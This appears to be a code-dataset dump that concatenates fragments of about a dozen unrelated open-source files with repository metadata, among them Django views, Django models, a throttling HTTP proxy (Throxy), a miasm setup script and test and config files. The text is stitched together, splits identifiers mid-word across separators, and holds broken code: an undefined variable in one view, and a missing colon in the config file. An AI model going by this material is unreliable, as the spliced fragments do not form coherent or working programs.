# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required
|
by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ge
|
ttext
gettext.install('glance', unicode=1)
|
Bringing-Buzzwords-Home/bringing_buzzwords_home
|
visualize/views.py
|
Python
|
mit
| 8,056 | 0.005462 |
import operator
import json
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, HttpResponseRedirect
from .models import County, GuardianCounted, Geo, Item, Station, Crime, State
from .utilities import states, get_dollars_donated_by_year, format_money
from .utilities import get_state_deaths, get_state_deaths_over_time, make_state_categories
from .utilities import get_state_violent_crime, get_county_deaths, create_counties_list
from .utilities import create_county_crime, make_per_capita_guns, state_abbrev
from .utilities import get_categories_per_capita, format_integer, get_state_property_crime
from .utilities import get_prop_crime_data, get_prop_crime_data_per_cap, format_float
from .utilities import get_viol_crime_data, get_viol_crime_data_per_cap, get_fatal_encounters
from .utilities import get_fatal_encounters_per_cap, get_military_value
from .utilities import get_military_value_per_cap
from rest_framework import viewsets
from .serializers import StateSerializer
from django.db.models import Sum, Func, Count, F
from nvd3 import *
from django.utils.safestring import mark_safe
class StateViewSet(viewsets.ReadOnlyModelViewSet):
queryset = State.objects.all().order_by('state')
serializer_class = StateSerializer
def index(request):
state_list = sorted(states.items(), key=operator.itemgetter(1))
context = {'states': state_list}
return render(request, "visualize/index.html", context)
def state(request, state):
state = state.upper()
state_obj = get_object_or_404(State, state=state)
state_deaths = get_state_deaths(state)
category_data, categories = make_state_categories(state)
ten_thirty_three_total = Item.objects.filter(state=state).aggregate(Sum('Total_Value'))['Total_Value__sum']
twenty_fifteen_kills = GuardianCounted.objects.filter(state=county).count()
twenty_fifteen_population = County.objects.filter(state=states[state]).aggregate(Sum('pop_est_2015'))['pop_est_2015__sum']
context = {'state': state,
'state_num': sta
|
te_deaths['2015 {} Fatal Encounters'.format(states[state])],
'average': state_deaths['2015 Average Fatal Encounters'],
'long_state_n
|
ame': states[state],
'counties_list': create_counties_list(state),
'categories': categories,
'twenty_fourteen_violent': format_integer(state_obj.total_violent_crime),
'twenty_fourteen_property': format_integer(state_obj.total_property_crime),
'twenty_fifteen_kills': str(twenty_fifteen_kills),
'ten_thirty_three_total': format_money(ten_thirty_three_total),
'twenty_fifteen_population': format_integer(twenty_fifteen_population),
}
return render(request, "visualize/state.html", context)
def state_json(request, state):
state = state.upper()
state_obj = get_object_or_404(State, state=state)
state_deaths = get_state_deaths(state)
category_data, category_nums = make_state_categories(state)
per_capita_guns, per_capita_nums = make_per_capita_guns(state)
avg_violent_crime, per_capita_violent_crime = get_state_violent_crime(state_obj)
avg_property_crime, per_capita_property_crime = get_state_property_crime(state_obj)
data = {'state_deaths': [dict(key='State Deaths', values=[dict(label=key, value=value) for key, value in state_deaths.items()])],
'deaths_over_time': get_state_deaths_over_time(state),
'category_data': category_data,
'categories_per_capita': get_categories_per_capita(state, category_data),
'dollars_by_year': get_dollars_donated_by_year(state),
'avg_violent_crime': avg_violent_crime,
'per_capita_violent_crime': per_capita_violent_crime,
'per_capita_rifles': per_capita_guns,
'per_capita_nums': per_capita_nums,
'category_nums': category_nums,
'avg_property_crime': avg_property_crime,
'per_capita_property_crime': per_capita_property_crime}
return HttpResponse(json.dumps(data), content_type='application/json')
def county(request, county):
county_obj = County.objects.get(id=county)
total_num_counties_in_country = 3112
state = state_abbrev[county_obj.state]
state_obj = State.objects.get(state=state)
num_counties_in_state = len(County.objects.filter(state=county_obj.state))
county_pop = county_obj.pop_est_2015
state_pop = (State.objects.get(state=state)).total_population_twentyfifteen
us_population = State.objects.all().aggregate(Sum('total_population_twentyfifteen'))['total_population_twentyfifteen__sum']
county_violent = int(Crime.objects.filter(year='2014-01-01', county=county).aggregate(Sum('violent_crime'))['violent_crime__sum'])
county_property = int(Crime.objects.filter(year='2014-01-01', county=county).aggregate(Sum('property_crime'))['property_crime__sum'])
county_military_value = int(Item.objects.filter(county=county).aggregate(Sum('Total_Value'))['Total_Value__sum'])
county_fatal_encounters = int(GuardianCounted.objects.filter(county=county, date__year=2015).count())
county_crime = [county_violent, county_property]
average_state_crime_prop = get_prop_crime_data(state, county_obj, total_num_counties_in_country,
state_obj, num_counties_in_state, county)
average_state_crime_prop_per_cap = get_prop_crime_data_per_cap(
county_property, state, county_obj, us_population,
state_pop, county_pop, state_obj)
average_state_crime_viol = get_viol_crime_data(state, county_obj, total_num_counties_in_country,
state_obj, num_counties_in_state, county)
average_state_crime_viol_per_cap = get_viol_crime_data_per_cap(
county_violent, state, county_obj, us_population,
state_pop, county_pop, state_obj)
average_fatal_encounters = get_fatal_encounters(state, county_obj, total_num_counties_in_country,
state_obj, num_counties_in_state, county)
average_fatal_encounters_per_cap = get_fatal_encounters_per_cap(county_fatal_encounters, us_population,
state_pop, state, county_obj, state_obj, county_pop)
average_military_value = get_military_value(state, county_obj, total_num_counties_in_country,
state_obj, num_counties_in_state, county)
average_military_value_per_cap = get_military_value_per_cap(us_population, state_pop, county_pop,
county_military_value, state_obj, county_obj, state)
context = {
'military_value': mark_safe(json.dumps(average_military_value)),
'military_value_per_cap': mark_safe(json.dumps(average_military_value_per_cap)),
'prop_crime': mark_safe(json.dumps(average_state_crime_prop)),
"prop_crime_per_cap": mark_safe(json.dumps(average_state_crime_prop_per_cap)),
'viol_crime': mark_safe(json.dumps(average_state_crime_viol)),
"viol_crime_per_cap": mark_safe(json.dumps(average_state_crime_viol_per_cap)),
'average_fatal_encounters': mark_safe(json.dumps(average_fatal_encounters)),
'average_fatal_encounters_per_cap': mark_safe(json.dumps(average_fatal_encounters_per_cap)),
'county': county,
'county_obj': county_obj,
'twenty_fourteen_violent': format_integer(county_violent),
'twenty_fourteen_property': format_integer(county_property),
'twenty_fifteen_kills': format_integer(county_fatal_encounters),
'ten_thirty_three_total': format_money(county_military_value),
'counties_list': create_counties_list(state),
'county_pop_twenty_fifteen': format_integer(county_obj.pop_est_2015),
'state_abbrev': state,
}
return render(request, "visualize/county.html", context)
def about(request):
return render(request, "visualize/about.html")
|
gallandarakhneorg/autolatex
|
src/autolatex2/cli/commands/showconfigfiles.py
|
Python
|
lgpl-3.0
| 2,465 | 0.017039 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright (C) 1998-2021 Stephane Galland <galland@arakhne.org>
#
# This program
|
is free library; you can redistribute it and/or modify
# it under the terms of the GNU L
|
esser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or any later version.
#
# This library is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; see the file COPYING. If not,
# write to the Free Software Foundation, Inc., 59 Temple Place - Suite
# 330, Boston, MA 02111-1307, USA.
import os
import logging
from autolatex2.cli.main import AbstractMakerAction
from autolatex2.utils.extprint import eprint
import gettext
_T = gettext.gettext
class MakerAction(AbstractMakerAction):
id = 'showconfigfiles'
help = _T('Display the list of the detected configuration files that will be read by autolatex')
def run(self, args) -> bool:
'''
Callback for running the command.
:param args: the arguments.
:return: True to continue process. False to stop the process.
'''
system_path = self.configuration.systemConfigFile
if system_path is not None:
if os.path.isfile(system_path):
if os.access(system_path, os.R_OK):
eprint(system_path)
else:
logging.error(_T("%s (unreable)") % (system_path))
else:
logging.error(_T("%s (not found)") % (system_path))
user_path = self.configuration.userConfigFile
if user_path is not None:
if os.path.isfile(user_path):
if os.access(user_path, os.R_OK):
eprint(user_path)
else:
logging.error(_T("%s (unreadable)") % (user_path))
else:
logging.error(_T("%s (not found)") % (user_path))
document_directory = self.configuration.documentDirectory
if document_directory is None:
logging.error(_T("Cannot detect document directory"))
else:
doc_path = self.configuration.makeDocumentConfigFilename(document_directory)
if doc_path is not None:
if os.path.isfile(doc_path):
if os.access(doc_path, os.R_OK):
eprint(doc_path)
else:
logging.error(_T("%s (unreadable)") % (doc_path))
else:
logging.error(_T("%s (not found)") % (doc_path))
return True
|
DHLabs/keep
|
keep_backend/organizations/models.py
|
Python
|
mit
| 2,600 | 0.018846 |
import hashlib
from django.contrib.auth.models import Group
from django.db import models
USER_MODEL = 'auth.User'
class Organization( Group ):
|
'''
Umbrella object with which users are associated.
An organization can have multiple users.
'''
gravatar = models.EmailField( blank=True )
owner = models.ForeignKey( USER_MOD
|
EL )
users = models.ManyToManyField( USER_MODEL,
through='OrganizationUser',
related_name='organization_users' )
class Meta:
ordering = [ 'name' ]
verbose_name = 'organization'
verbose_name_plural = 'organizations'
def __unicode__( self ):
return self.name
def icon( self ):
if len( self.gravatar ) == 0:
return '//gravatar.com/avatar/0000000000000000000000000000000?d=mm'
m = hashlib.md5()
m.update( self.gravatar.strip().lower() )
return '//gravatar.com/avatar/%s' % ( m.hexdigest() )
def add_user( self, user ):
'''
Add a ( pending ) user to this organization.
'''
pending_user = OrganizationUser( user=user,
organization=self,
pending=True,
is_admin=False )
pending_user.save()
return pending_user
def has_user( self, user ):
org_user = OrganizationUser.objects.filter( user=user,
organization=self )
return len( org_user ) > 0
class OrganizationUser( models.Model ):
'''
ManyToMany through field relating Users to Organizations
Since it is possible for a User to be a member of multiple orgs this
class relates the OrganizationUser ot the User model using a ForeignKey
relationship, rather than a OneToOne relationship.
'''
user = models.ForeignKey( USER_MODEL,
related_name='organization_user' )
organization = models.ForeignKey( Organization,
related_name='organization_user' )
pending = models.BooleanField( default=True )
is_admin = models.BooleanField( default=False )
class Meta:
ordering = [ 'organization', 'user' ]
unique_together = ( 'user', 'organization' )
verbose_name = 'organization user'
verbose_name_plural = 'organization users'
def __unicode__( self ):
return '%s ( %s )' % ( self.user.username, self.organization.name )
|
pypa/virtualenv
|
tests/unit/activation/test_nushell.py
|
Python
|
mit
| 816 | 0.001225 |
from __future__ import absolute_import, unicode_literals
import sys
if sys.version_info > (3,):
from shutil import which
else:
from distutils.spawn import find_executable as which
from virtualenv.activation import NushellActivator
from virtualenv.info import IS_WIN
def test_nushell(activation_tester_class, activation_tester):
class Nushell(activation_tester_class):
def __init__(self, session):
cmd = which("nu")
if cmd is None and IS_WIN:
|
cmd = "c:\\program files\\nu\\bin\\nu.exe"
super(Nushell, self).__init__(NushellActivator, session, cmd, "activate.nu", "nu")
self.unix_line_ending =
|
not IS_WIN
def print_prompt(self):
return r"echo $virtual_prompt; printf '\n'"
activation_tester(Nushell)
|
foligny/browsershots-psycopg2
|
throxy/throxy.py
|
Python
|
gpl-3.0
| 19,293 | 0.001451 |
#! /usr/bin/env python
# throxy.py - HTTP proxy to simulate dial-up access
# Copyright (c) 2007 Johann C. Rocholl <johann@browsershots.org>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Throxy: throttling HTTP proxy in one Python file
To use it, run this s
|
cript on your local machine and adjust your
browser settings to use 127.0.0.1:8080 as HTTP proxy.
* Simulate a slow connection (like dial-up).
* Adjustable bandwidth limit for download and upload.
* Optionally dump HTTP headers and content for debugging.
* Decompress gzip content encoding for debugging.
* Multiple connections, without thread
|
s (uses asyncore).
* Only one source file, written in pure Python.
Simulate analog modem connection:
$ python throxy.py -u28.8 -d57.6
Show all HTTP headers (request & reply):
$ python throxy.py -qrs
Dump HTTP headers and content to a file, without size limits:
$ python throxy.py -rsRS -l0 -L0 -g0 > dump.txt
Tell command line tools to use the proxy:
$ export http_proxy=127.0.0.1:8080
"""
import sys
import asyncore
import socket
import time
import gzip
import struct
import cStringIO
import re
__revision__ = '$Rev: 1180 $'
KILO = 1000 # decimal or binary kilo
request_match = re.compile(r'^([A-Z]+) (\S+) (HTTP/\S+)$').match
def debug(message, newline=True):
"""Print message to stderr and clear the rest of the line."""
if options.quiet:
return
if newline:
message = message.ljust(79) + '\n'
sys.stderr.write(message)
class Header:
"""HTTP (request or reply) header parser."""
def __init__(self):
self.data = ''
self.lines = []
self.complete = False
def append(self, new_data):
"""
Add more data to the header.
Any data after the end of the header is returned, as it may
contain content, or even the start of the next request.
"""
self.data += new_data
while not self.complete:
newline = self.data.find('\n')
if newline < 0:
break # No complete line found
line = self.data[:newline].rstrip('\r')
if len(line):
self.lines.append(line)
else:
self.complete = True
self.content_type = self.extract('Content-Type')
self.content_encoding = self.extract('Content-Encoding')
if self.content_encoding == 'gzip':
self.gzip_data = cStringIO.StringIO()
self.data = self.data[newline+1:]
if self.complete:
rest = self.data
self.data = ''
return rest
else:
return ''
def extract(self, name, default=''):
"""Extract a header field."""
name = name.lower()
for line in self.lines:
if not line.count(':'):
continue
key, value = line.split(':', 1)
if key.lower() == name:
return value.strip()
return default
def extract_host(self):
"""Extract host and perform DNS lookup."""
self.host = self.extract('Host')
if self.host is None:
return
if self.host.count(':'):
self.host_name, self.host_port = self.host.split(':')
self.host_port = int(self.host_port)
else:
self.host_name = self.host
self.host_port = 80
self.host_ip = socket.gethostbyname(self.host_name)
self.host_addr = (self.host_ip, self.host_port)
def extract_request(self):
"""Extract path from HTTP request."""
match = request_match(self.lines[0])
if not match:
raise ValueError("malformed request line " + self.lines[0])
self.method, self.url, self.proto = match.groups()
if self.method.upper() == 'CONNECT':
raise ValueError("method CONNECT is not supported")
prefix = 'http://' + self.host
if not self.url.startswith(prefix):
raise ValueError("URL doesn't start with " + prefix)
self.path = self.url[len(prefix):]
def dump_title(self, from_addr, to_addr, direction, what):
"""Print a title before dumping headers or content."""
print '==== %s %s (%s:%d => %s:%d) ====' % (
direction, what,
from_addr[0], from_addr[1],
to_addr[0], to_addr[1])
def dump(self, from_addr, to_addr, direction='sending'):
"""Dump header lines to stdout."""
self.dump_title(from_addr, to_addr, direction, 'headers')
print '\n'.join(self.lines)
print
def dump_content(self, content, from_addr, to_addr, direction='sending'):
"""Dump content to stdout."""
self.dump_title(from_addr, to_addr, direction, 'content')
if self.content_encoding:
print "(%d bytes of %s with %s encoding)" % (len(content),
repr(self.content_type), repr(self.content_encoding))
else:
print "(%d bytes of %s)" % (len(content), repr(self.content_type))
if self.content_encoding == 'gzip':
if options.gzip_size_limit == 0 or \
self.gzip_data.tell() < options.gzip_size_limit:
self.gzip_data.write(content)
try:
content = self.gunzip()
except IOError, error:
content = 'Could not gunzip: ' + str(error)
if self.content_type.startswith('text/'):
limit = options.text_dump_limit
elif self.content_type.startswith('application/') and \
self.content_type.count('xml'):
limit = options.text_dump_limit
else:
limit = options.data_dump_limit
content = repr(content)
if len(content) < limit or limit == 0:
print content
else:
print content[:limit] + '(showing only %d bytes)' % limit
print
def gunzip(self):
"""Decompress gzip content."""
if options.gzip_size_limit and \
self.gzip_data.tell() > options.gzip_size_limit:
raise IOError("More than %d bytes" % options.gzip_size_limit)
self.gzip_data.seek(0) # Seek to start of data
try:
gzip_file = gzip.GzipFile(
fileobj=self.gzip_data, mode='rb')
result = gzip_file.read()
gzip_file.close()
except struct.error:
raise IOError("Caught struct.error from gzip module")
self.gzip_data.seek(0, 2) # Seek to end of data
return result
class Throttle:
"""Bandwidth limit tracker."""
def __init__(self, kbps, interval=1.0):
self.bytes_per_second = int(kbps * KILO) / 8
self.interval = interval
self.fragment_size = min(512, self.bytes_per_second / 4)
self.transmit_log = []
self.weighted_throughput = 0.0
self.real_throughput = 0
self.last_updated = time.time()
def update_throughput(self, now):
"""Update weighted and real throughput."""
self.weighted_throughput = 0.0
self.real_throughput = 0
for timestamp, bytes in self.transmit_log
|
jaesivsm/pyAggr3g470r
|
jarr/controllers/abstract.py
|
Python
|
agpl-3.0
| 5,796 | 0.000173 |
import logging
from datetime import timezone
import dateutil.parser
from sqlalchemy import and_, or_
from werkzeug.exceptions import Forbidden, NotFound, Unauthorized
from jarr.bootstrap import Base, session
logger = logging.getLogger(__name__)
def cast_to_utc(dt_obj):
dt_obj = dateutil.parser.parse(dt_obj)
if not dt_obj.tzinfo:
return dt_obj.replace(tzinfo=timezone.utc)
return dt_obj
class AbstractController:
_db_cls = Base # reference to the database class, to redefine in child cls
_user_id_key = 'user_id'
def __init__(self, user_id=None, ignore_context=False):
"""
Base methods for controllers accross JARR.
User id is a right management mechanism that should be used to
filter objects in database on their denormalized "user_id" field
(or "id" field for users).
Should no user_id be provided, the Controller won't apply any filter
allowing for a kind of "super user" mode.
"""
if self._db_cls is None:
raise NotImplementedError("%r _db_cls isn't overridden" % self)
try:
self.user_id = int(user_id)
except TypeError:
self.user_id = user_id
@staticmethod
def _to_comparison(key, model):
"""Extract from the key the method used by sqla for comparison."""
if '__' not in key:
return getattr(model, key).__eq__
attr, ope = key.rsplit('__', 1)
if ope == 'nin':
return getattr(model, attr).notin_
if ope == 'in':
return getattr(model, attr).in_
if ope not in {'like', 'ilike'}:
ope = '__%s__' % ope
return getattr(getattr(model, attr), ope)
@classmethod
def _to_filters(cls, **filters):
"""
Will translate filters to sqlalchemy filter.
This method will also apply user_id restriction if available.
each parameters of the function is treated as an equality unless the
name of the parameter ends with either "__gt", "__lt", "__ge", "__le",
"__ne", "__in", "__like" or "__ilike".
"""
db_filters = set()
for key, value in filters.items():
if key == '__or__':
db_filters.add(or_(*[and_(*cls._to_filters(**sub_filter))
for sub_filter in value]))
elif key == '__and__':
for sub_filter in value:
for k, v in sub_filter.items():
db_filters.add(cls._to_comparison(k, cls._db_cls)(v))
else:
db_filters.add(cls._to_comparison(key, cls._db_cls)(value))
return db_filters
def _get(self, **filters):
"""
Abstract get.
Will add the current user id if that one is not none (in which case
the decision has been made in the code that the query shouldn't be user
dependant) and the user is not an admin and the filters doesn't already
contains a filter for that user.
"""
if self._user_id_key is not None and self.user_id \
and filters.get(self._user_id_key) != self.user_id:
filters[self._user_id_key] = self.user_id
return session.query(self._db_cls).filter(*self._to_filters(**filters))
def get(self, **filters):
"""Will return one single objects corresponding to filters"""
obj = self._get(**filters).first()
if obj and not self._has_right_on(obj):
raise Forbidden('No authorized to access %r (%r)' % (
self._db_cls.__class__.__name__, filters))
if not obj:
raise NotFound('No %r (%r)' % (self._db_cls.__class__.__name__,
filters))
return obj
def create(self, **attrs):
if not attrs:
raise ValueError("attributes to update must not be empty")
if self._user_id_key is not None and self._user_id_key not in attrs:
attrs[self._user_id_key] = self.user_id
if not (self._user_id_key is None or self._user_id_key in attrs
or self.user_id is None):
raise Unauthorized("You must provide user_id one way or another")
obj = self._db_cls(**attrs)
session.add(obj)
session.flush()
session.commit()
return obj
def read(self, **filters):
return self._get(**filters)
def update(self, filters, attrs, return_objs=False, commit=True):
if not attrs:
logger.error("nothing to update, doing nothing")
result, commit = {}, False
else:
result = self._get(**filters).update(attrs,
synchronize_session=False)
if commit:
session.flush()
session.commit()
if return_objs:
return self._get(**filters)
return result
def delete(self, obj_id, commit=True):
obj = self.get(id=obj_id)
session.delete(obj)
if commit:
session.flush()
session.commit()
return obj
def _has_right_on(self, obj):
# user_id == None is like being admin
if self._user_id_key is None:
return True
return self.user_id is None \
or getattr(obj, self._user_id_key, None) == self.user_id
def assert_right_ok(s
|
elf, obj_id):
if not self.user_id:
raise ValueError("%r user_id can't be None" % self)
rows = self.__
|
class__().read(id=obj_id).with_entities(
getattr(self._db_cls, self._user_id_key)).first()
if not rows:
raise NotFound()
if not rows[0] == self.user_id:
raise Forbidden()
|
chubbymaggie/miasm
|
setup.py
|
Python
|
gpl-2.0
| 6,252 | 0.006718 |
#! /usr/bin/env python
from distutils.core import setup, Extension
from distutils.util import get_platform
import shutil
import os, sys
def buil_all():
packages=['miasm2',
'miasm2/arch',
'miasm2/arch/x86',
'miasm2/arch/arm',
'miasm2/arch/aarch64',
'miasm2/arch/msp430',
'miasm2/arch/sh4',
'miasm2/arch/mips32',
'miasm2/core',
'miasm2/expression',
'miasm2/ir',
'miasm2/ir/translators',
'miasm2/analysis',
'miasm2/os_dep',
'miasm2/jitter',
'miasm2/jitter/arch',
'miasm2/jitter/loader',
]
ext_modules_no_tcc = [
Extension("miasm2.jitter.VmMngr",
["miasm2/jitter/vm_mngr.c",
"miasm2/jitter/vm_mngr_py.c"]),
Extension("miasm2.jitter.arch.JitCore_x86",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_x86.c"]),
Extension("miasm2.jitter.arch.JitCore_arm",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_arm.c"]),
Extension("miasm2.jitter.arch.JitCore_aarch64",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_aarch64.c"]),
Extension("miasm2.jitter.arch.JitCore_msp430",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_msp430.c"]),
Extension("miasm2.jitter.arch.JitCore_mips32",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_mips32.c"]),
Extension("miasm2.jitter.Jitgcc",
["miasm2/jitter/Jitgcc.c"]),
Extension("miasm2.jitter.Jitllvm",
["miasm2/jitter/Jitllvm.c"]),
]
ext_modules_all = [
Extension("miasm2.jitter.VmMngr",
["miasm2/jitter/vm_mngr.c",
"miasm2/jitter/vm_mngr_py.c"]),
Extension("miasm2.jitter.arch.JitCore_x86",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_x86.c"]),
Extension("miasm2.jitter.arch.JitCore_arm",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_arm.c"]),
Extension("miasm2.jitter.arch.JitCore_aarch64",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_aarch64.c"]),
Extension("miasm2.jitter.arch.JitCore_msp430",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_msp430.c"]),
Extension("miasm2.jitter.arch.JitCore_mips32",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_mips32.c"]),
Extension("miasm2.jitter.Jitllvm",
["miasm2/jitter/Jitllvm.c"]),
Extension("miasm2.jitter.Jitgcc",
["miasm2/jitter/Jitgcc.c"]),
Extension("miasm2.jitter.Jittcc",
["miasm2/jitter/Jittcc.c"],
libraries=["tcc"])
]
print 'building'
build_ok = False
for name, ext_modules in [('all', ext_modules_all),
('notcc', ext_modules_no_tcc)]:
print 'build with', repr(name)
try:
s = setup(
name = 'Miasm',
version = '2.0',
packages = packages,
package_data = {'miasm2':['jitter/*.h',
'jitter/arch/*.h',]},
ext_modules = ext_modules,
# Metadata
author = 'Fabrice Desclaux',
author_email = 'serpilliere@droid-corp.org',
description = 'Machine code manipulation library',
license = 'GPLv2',
# keywords = '',
# url = '',
)
except SystemExit, e:
print repr(e)
continue
build_ok = True
break
if not build_ok:
raise ValueError('Unable to build Miasm!')
print 'build', name
if name == 'notcc':
print
print "*"*80
print "Warning: TCC is not properly installed,"
print "Miasm will be installed without TCC Jitter"
print "Etheir install TCC or use LLVM jitter"
print "*"*80
print
# we copy libraries from build dir to current miasm directory
build_base = None
if 'build' in s.command_options:
if 'build_base' in s.command_options['build']:
build_base = s.command_options['build']['build_base']
if build_base is None:
build_base = "build"
plat_specifier = ".%s-%s" % (get_platform(), sys.version[0:3])
build_base = os.path.join('build','lib' + plat_specifier)
print build_base
def buil_no_tcc():
setup(
name = 'Miasm',
version = '2.0',
packages=['miasm2', 'miasm2/tools',
'miasm2/expression', 'miasm2/graph', 'miasm2/arch',
'miasm2/core', 'miasm2/tools/emul_lib' ],
package_data = {'miasm2':['tools/emul_lib/*.h']}
|
,
# data_files = [('toto', ['miasm2/tools/emul_lib/queue.h'])],
# Metadata
author = 'Fabrice Desclaux',
author_email = 'serpilliere@droid-corp.org',
description = 'Machine code manipulation library',
license = 'GPLv2',
# keywords = '',
# url = '',
)
def try_build():
buil_all()
"""
try:
buil_all()
return
except:
print "WARNING cannot
|
build with libtcc!, trying without it"
print "Miasm will not be able to emulate code"
buil_no_tcc()
"""
try_build()
|
NavarraBiomed/seguimientoPacientes
|
ictus/migrations/0029_auto_20161212_1316.py
|
Python
|
gpl-2.0
| 852 | 0.00235 |
# -*- cod
|
ing: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('ictus', '0028_auto_20161212_1316'),
]
operations = [
migrations.A
|
lterField(
model_name='basal',
name='alcohol',
field=models.IntegerField(null=True, choices=[('00', 'No'), ('01', 'A diario'), ('02', 'Ocasionalmente'), ('03', 'Exhabito enólico')], blank=True, verbose_name='Alcohol'),
),
migrations.AlterField(
model_name='basal',
name='tabaquismo',
field=models.IntegerField(null=True, choices=[('00', 'No fumador'), ('01', 'Exfumador'), ('02', 'Fumador pasivo'), ('03', 'Fumador actual'), ('04', 'Desconocido')], blank=True, verbose_name='Tabaco'),
),
]
|
LastAvenger/labots
|
labots/common/message.py
|
Python
|
gpl-3.0
| 223 | 0.004484 |
fr
|
om typing import List
class Message(object):
class Origin(object):
servername: str
nickname: str
username: str
hostname: str
command: str
|
origin: Origin
params: List[str]
|
zstackio/zstack-woodpecker
|
integrationtest/vm/e2e_mini/volume/test_volume_backup.py
|
Python
|
apache-2.0
| 1,389 | 0.00432 |
# -*- coding:utf-8 -*-
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
volume = test_lib.lib_get_specific_stub('e2e_mini/volume', 'volume')
volume_ops = None
vm_ops = None
volume_name = 'volume-' + volume.get_time_postfix()
backup_name = 'backup-' + volume.get_time_postfix()
def test():
global volume_ops
volume_ops = volume.VOLUME()
vm = test_lib.lib_get_specific_stub(suite_name='e2e_mini/vm', specific_name='vm')
vm_ops = vm.VM(uri=volume_op
|
s.uri, initialized=True)
vm_ops.create_vm()
volume_ops.create_volume(volume_name)
volume_ops.volume_attach_to_vm(vm_ops.vm_name)
volume_ops.create_backup(volume_na
|
me, 'volume', backup_name)
vm_ops.vm_ops(vm_ops.vm_name, action='stop')
volume_ops.restore_backup(volume_name, 'volume', backup_name)
volume_ops.delete_backup(volume_name, 'volume', backup_name)
volume_ops.check_browser_console_log()
test_util.test_pass('Test Volume Create, Restore and Delete Backups Successful')
def env_recover():
global volume_ops
vm_ops.expunge_vm()
volume_ops.expunge_volume(volume_name)
volume_ops.close()
#Will be called only if exception happens in test().
def error_cleanup():
global volume_ops
try:
vm_ops.expunge_vm()
volume_ops.expunge_volume(volume_name)
volume_ops.close()
except:
pass
|
Sotera/aggregate-micro-paths
|
hive-streaming/conf/config.py
|
Python
|
apache-2.0
| 3,321 | 0.016561 |
# Copyright
|
2016 Sotera Defense Solutions Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License fo
|
r the specific language governing permissions and
# limitations under the License.
import math
import six
if six.PY2
from ConfigParser import SafeConfigParser
else
from configparser import SafeConfigParser
class AggregateMicroPathConfig:
config_file = ""
table_name = ""
table_schema_id = ""
table_schema_dt = ""
table_schema_lat = ""
table_schema_lon = ""
time_filter = 0
distance_filter = 0
tripLat1 = 0
tripLon1 = 0
tripLat2 = 0
tripLon2 = 0
tripname = ""
resolutionLat = 0
resolutionLon = 0
tripLatMin = 0
tripLatMax = 0
tripLonMin = 0
tripLonMax = 0
triplineBlankets = []
def __init__(self, config, basePath = "./"):
configParser = SafeConfigParser()
configParser.read(basePath + config)
self.config_file = config
self.database_name = configParser.get("AggregateMicroPath", "database_name")
self.table_name = configParser.get("AggregateMicroPath", "table_name")
self.table_schema_id = configParser.get("AggregateMicroPath", "table_schema_id")
self.table_schema_dt = configParser.get("AggregateMicroPath", "table_schema_dt")
self.table_schema_lat = configParser.get("AggregateMicroPath", "table_schema_lat")
self.table_schema_lon = configParser.get("AggregateMicroPath", "table_schema_lon")
self.time_filter = long(configParser.get("AggregateMicroPath", "time_filter"))
self.distance_filter = long(configParser.get("AggregateMicroPath", "distance_filter"))
self.tripLat1 = float(configParser.get("AggregateMicroPath", "lower_left_lat"))
self.tripLon1 = float(configParser.get("AggregateMicroPath", "lower_left_lon"))
self.tripLat2 = float(configParser.get("AggregateMicroPath", "upper_right_lat"))
self.tripLon2 = float(configParser.get("AggregateMicroPath", "upper_right_lon"))
